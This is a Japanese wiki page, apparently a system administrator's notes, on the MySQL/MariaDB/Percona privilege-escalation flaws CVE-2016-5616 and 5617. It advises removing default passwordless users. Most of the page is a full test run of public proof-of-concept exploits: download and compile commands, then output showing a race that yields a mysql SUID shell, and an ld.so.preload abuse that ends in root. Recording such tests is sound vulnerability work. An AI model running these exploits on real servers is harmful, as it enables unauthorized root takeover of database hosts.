![[PukiWiki]](image/pukiwiki.png "[PukiWiki]")
#author("2024-09-02T06:37:42+00:00","default:iseki","iseki") #author("2024-09-02T06:38:33+00:00","default:iseki","iseki") ** CVE-2016-5616, 5617 [#u7059892] *** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6] - 該当マシンにアカウントがあり,データベースのアクセス(書き込み)可能な場合,Root権限を奪取される - MySQL の初期ユーザ等が残っている場合は特に危険. - [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616]] - [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5617]] - http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html - http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html **** デフォルトユーザ [#c3c58224] - パスワードなし,ユーザ名なしのデータはインストール時に削除すべき. MariaDB [(none)]> use mysql; MariaDB [mysql]> select Host,User,Password from user; +-----------+------+-------------------------------------------+ | Host | User | Password | +-----------+------+-------------------------------------------+ | localhost | root | *1B1F13007F2FA68140D751B563EB49E0186A116B | | rigel-b | root | | | 127.0.0.1 | root | | | ::1 | root | | | localhost | | | | rigel-b | | | +-----------+------+-------------------------------------------+ - 以下のコマンドで削除しておく MariaDB [(none)]> use mysql; MariaDB [mysql]> delete from user where user=''; MariaDB [mysql]> delete from user where password=''; **** mysql ユーザアカウントのダッシュ [#z9d7510f] - Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c]] $ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c $ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / CVE-2016-5616 For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as: uid=502(iseki) gid=100(users) 所属グループ=100(users) [+] Connecting to the database `test` as @localhost [+] Creating exploit temp directory /tmp/mysql_privesc_exploit [+] Creating mysql tables DROP TABLE IF EXISTS exploit_table DROP TABLE IF EXISTS mysql_suid_shell CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' [+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Entering the race loop... Hang in there... ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Spawning the mysql SUID shell now... Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) mysql_suid_shell.MYD-4.1$ whoami mysql **** mysql アカウントからの root アカウントのダッシュ [#l4b08281] - Exploit code : [[mysql-chowned.sh>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]] - Exploit code : [[mysql-chowned.sh>http://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]] mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit mysql-chowned.sh (ver. 1.0) CVE-2016-6664 / CVE-2016-5617 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) [+] Target MySQL log file set to /var/mysql/rigel-b.err [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh [+] Symlink created at: lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload [+] Waiting for MySQL to re-open the logs/MySQL service restart... [+] Waiting for MySQL to re-open the logs/MySQL service restart... ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません Do you want to kill mysqld process to instantly get root? :) ? [y/n] y Got it. Executing 'killall mysqld' now... [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh Got root! The database server has been ch-OWNED ! [+] Spawning the rootshell /tmp/mysqlrootsh now! mysqlrootsh-4.1# whoami root
